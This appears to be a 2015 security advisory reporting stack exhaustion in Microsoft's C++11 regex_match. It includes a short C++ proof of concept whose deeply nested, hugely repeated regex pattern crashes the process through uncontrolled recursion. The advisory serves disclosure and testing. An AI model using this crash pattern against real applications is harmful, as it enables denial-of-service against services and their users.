Microsoft C++11 <regex> 'regex_match' function stack exhaustion

2015.11.14

Credit: Maksymilian Arciemowicz

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

Microsoft C++11 <regex> 'regex_match' function Stack Overflow
Auhor: Maksymilian Arciemowicz
Tested on: Windows 10 and Visual Studio 2013
CWE: https://cwe.mitre.org/data/definitions/674.html

The Microsoft C++11 <regex> does not properly control the amount of recursion that takes place, which consumes excessive resources of stack. 

Expected 'error_type':
error_stack	there was not enough memory to perform a match

Retured:
Crash due stack exhaustion

PoC:
-------------------
#include "stdafx.h"
#include <regex> 
#include <iostream> 

using namespace std;

int _tmain(int argc, _TCHAR* argv[])
{

	const char *first = "abc abc abc abc abc abc abc abc abc";
	const char *last = first + strlen(first);
	cmatch narrowMatch;

	regex rx("((((((((.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*){1,11111111}.*)");
	bool found = regex_match(first, last, narrowMatch, rx);

	return 0;

}
-------------------

References:

https://cwe.mitre.org/data/definitions/674.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft C++11 <regex> 'regex_match' function stack exhaustion

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.